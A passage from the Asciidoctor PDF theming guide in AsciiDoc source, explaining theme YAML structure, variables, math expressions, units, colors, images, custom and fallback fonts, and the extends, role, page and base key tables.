file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n line-height-length: 17\n line-height: $base-line-height-length \/ $base-font-size\nvertical-spacing: $base-line-height-length\nheading:\n font-color: #262626\n font-size: 17\n font-style: bold\n line-height: 1.2\n margin-bottom: $vertical-spacing\nlink:\n font-color: #002FA7\noutline-list:\n indent: $base-font-size * 1.5\nfooter:\n height: $base-line-height-length * 2.5\n line-height: 1\n recto:\n right:\n content: '{page-number}'\n verso:\n left:\n content: $footer-recto-right-content\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nInstead of writing a theme from scratch, you can extend the default theme using the `extends` key as follows:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nYou can also point the extends key at another custom theme to extend from it.\nCurrently, the base theme is always loaded first.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`) or hyphen (`-`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font-color`) into a single, qualified key (e.g., `link_font_color` or `link-font-color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase-font-color: #333333\nbase-font-family: Times-Roman\nbase-font-size: 12\n----\n\nOr, to avoid having to type the prefix `base-` multiple times, the keys may be written as a hierarchy:\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two spaces from the indentation of the parent level.\nAlso note the presence of the colon (`:`) after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n ** Font family name (e.g., Roboto)\n ** Font style (normal, bold, italic, bold_italic)\n ** Alignment (left, center, right, justify)\n ** Color as hex string (e.g., 'ff0000', #ff0000, or '#ff0000')\n ** Image path\n ** Enumerated type (where specified)\n ** Text content (where specified)\n* Null (clears any previously assigned value)\n ** _empty_ (i.e., no value specified)\n ** null\n ** ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n ** Color as RGB array (e.g., [51, 51, 51])\n ** Color CMYK array (e.g., [50, 100, 0, 0])\n ** Margin (e.g., [1in, 1in, 1in, 1in])\n ** Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color or $base-font-color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principle feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font-family\n* font-color\n* font-size\n* font-style\n* text-transform\n* line-height (currently some exceptions)\n* margin-bottom (if not specified, defaults to $vertical-spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading-h2-font-size`), then to the heading category (e.g., `heading-font-size`), then directly to the base value (e.g., `base-font-size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base-font-size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n----\n\nthe variable `$base-font-color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading-font-color` to the `$sidebar-title-font-color`.\n\n[source,yaml]\n----\nheading:\n font-color: #191919\nsidebar:\n title:\n font-color: $heading-font-color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n font-size-small: $base-font-size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary-color: #E0162B {conum-guard-yaml} <1>\n secondary-color: '#FFFFFF' {conum-guard-yaml} <2>\n alert-color: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add `+#+` in front of the hex color value to coerce it to a string.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value (for example, 000000 would become 0, so use '000000' or #000000 instead).\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: $brand-primary-color\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nLike programming languages, multiple and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line-height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font-size: 12.5\n font-size-large: ceil($base-font-size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the units defaults to pt.\n\nHowever, us humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inches\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, whereever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nMany places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes, or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes, or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\nThat same preprocessor will also coerce a primitive value to a string if `color` is the name of the last segment in the key (e.g., `font-color`).\nThis avoids the problem of 000 becoming 0 (and similar implicit conversions) when the theme file is parsed.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\ntable:\n background-color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages in the theme file are currently resolved relative to the value of the `pdf-themesdir` attribute.\n(If `pdf-theme` is a path that ends in `.yml`, and `pdf-themesdir` is not set, then the images are resolved relative to the directory of the path specified by `pdf-theme`).\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) and BMP format (.bmp) are not supported unless you're using prawn-gmagick.\nSee https:\/\/github.com\/asciidoctor\/asciidoctor-pdf#supporting-additional-image-file-formats[support for additional image file formats] for details.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle-page:\n background-image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle-page:\n background-image: image:title-cover.png[]\n----\n\nIn either case, the image is resolved relative to the value of the `pdf-themesdir` attribute, as previously described.\n\nLike in the AsciiDoc syntax, wrapping the value in the image macro allows you to specify other settings, such as `pdfwidth`, `fit`, and\/or `align`.\nFor example:\n\n[source,yaml]\n----\ntitle-page:\n logo-image: image:logo.png[width=250,align=center]\n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign the `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu-caret-content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\nNOTE: The string must be double quoted in order to use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\nIMPORTANT: Asciidoctor has no challenge working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThat means you need to provide a font (at least a fallback font) that contains glyphs for all the characters you want to use.\nIf you don't, you may notice that characters are missing.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font-family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font-family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nWARNING: Built-in (AFM) fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logic \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which is to simply crash.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nWhen using a TrueType font, you will get no warning for a missing glyph.\nThat's a consequence of how Prawn works and is outside of Asciidoctor PDF's control.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback font in the `default-with-fallback-font` theme.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, find the TTF file collection for the font you want to use.\nA collection typically consists of all four font styles:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so the italic styles are required._\n\nIn order for a third-party font to work properly with Prawn (and hence Asciidoctor PDF), several modifications are required.\nSee <<Prepare a Custom Font>> to learn how to prepare your font for use with Asciidoctor PDF.\n\nOnce you've obtained the TTF files, put them in the directory inside your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nRename the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font-catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font-family` property is accepted in the theme file.\nFor example, to use the Roboto font for all headings, use:\n\n[source,yaml]\n----\nheading:\n font-family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-theme=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nTIP: When Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.\nEffectively, it subsets the font.\nWhile that saves space taken up by the generated PDF, you may still be storing the full font in your source repository.\nTo minimize the size of the source font, you can use {url-fontforge}[FontForge] to subset the font ahead of time.\nSubsetting a font means remove glyphs you don't plan to use.\nDoing so it not a requirement, simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nText in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key in your theme file to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF, thus making them portable.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font only gets used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: The `default` theme does not use a fallback font.\nHowever, the built-in `default-with-fallback-font` theme does.\nUsing the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIt's use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font-catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\nOf course, make sure you've configured your theme to use your custom font:\n\n[source,yaml]\n----\nbase:\n font-family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom TTF font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) or hyphen (`-`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flatted when the theme is loaded (e.g., `align` nested under `base` becomes `base-align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section get inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you only have to declare keys that you want to override.\n\n[#keys-extends]\n=== Extends\n\nA theme can extend another theme using the `extends` key.\nFor example:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nThe extends key accepts either a single value or an array of values.\nEach value is interpreted as a filename.\nIf the filename equals `default`, it resolves to the location of the default (built-in) theme.\nIf the filename is absolute, it's used as is.\nIf the filename begins with `.\/`, it's resolved as a theme file relative to the current theme file.\nOtherwise, the filename is resolved as a theme file in the normal way (relative to the value of the `pdf-themesdir` attribute).\n\nCurrently, the base theme is always loaded first.\nThen, the files referenced by the extends key are loaded in order.\nFinally, the keys in the current file are loaded.\nEach time a theme is loaded, the keys are overlaid onto the keys from the previous theme.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|extends\n|String or Array\n(default: [])\n|extends:\n- default\n- .\/brand-theme.yml\n|===\n\n[#keys-role]\n=== Role\n\nThe keys in the `role` category define custom roles for formatting.\nThe name of the role is the first subkey level.\nThe role name may not contain a hyphen or underscore.\nThe keys under the role are the concrete theming properties.\n\nHere's an example of a role for making text red:\n\n[source,yaml]\n----\nrole:\n red:\n font-color: #ff0000\n----\n\nThis role can be used as follows:\n\n[source,asciidoc]\n----\nError text is shown in [.red]#red#.\n----\n\nCurrently, custom roles only apply to inline phrases and only support changing the font properties.\n\nThe converter provides several predefined roles.\nThe `big` and `small` roles map the font size to the $base_font_size_large and $base_font_size_small values, respectively.\nThese two roles can be redefined.\nThe `underline` and `line-through` roles add the underline and strikethrough decorations, respectively.\nThese two roles _can't_ be redefined.\nThe color roles (e.g., `blue`), which you may be familiar with from the HTML converter, are not mapped by default.\nYou'll need to define these in your theme if you'd like to make use of them when converting to PDF.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-role]*Key Prefix:* <<key-prefix-role,role-<name> >>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|role:\n red:\n font-color: #ff0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|role:\n label:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|role:\n large:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|role:\n heavy:\n font-style: bold\n|===\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommended that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently of other pages.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background-color: #fefefe\n\n|background-image^[2]^\n|image macro^[3]^ +\n(default: _not set_)\n|page:\n background-image: image:page-bg.png[]\n\n|background-image-(recto{vbar}verso)^[2]^\n|image macro^[3]^ +\n(default: _not set_)\n|page:\n background-image:\n recto: image:page-bg-recto.png[]\n verso: image:page-bg-verso.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin-inner^[4]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin-inner: 0.75in\n\n|margin-outer^[4]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin-outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n\n|numbering-start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|page:\n numbering-start-at: toc\n|===\n\n. To disable the background color for the page, set the value to white (i.e., FFFFFF).\nThe color keyword `transparent` is not recognized in this context.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).\nThe size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nThe position of the background image can be controlled using the `position` attribute.\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf you define the keys using the flatten structure (e.g., `page-background-image-recto`), you can also set the default page background image (`page-background-image`), which will then be used as a fallback if a background image isn't specified for a given side.\nTo disable the background image, use the value `none`.\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin-inner and margin-outer values.\nThese margins and used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommended that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base-border-radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border-color: #eeeeee\n\n\/\/ border-radius is variable, not an official 